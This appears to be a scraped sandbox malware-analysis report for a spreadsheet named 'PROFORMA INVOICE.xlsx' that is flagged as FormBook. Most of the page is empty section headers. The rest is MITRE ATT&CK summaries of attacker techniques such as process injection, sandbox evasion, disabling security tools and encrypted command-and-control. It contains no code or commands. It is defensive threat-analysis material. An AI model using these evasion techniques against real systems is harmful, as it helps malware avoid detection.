Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PROFORMA INVOICE.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON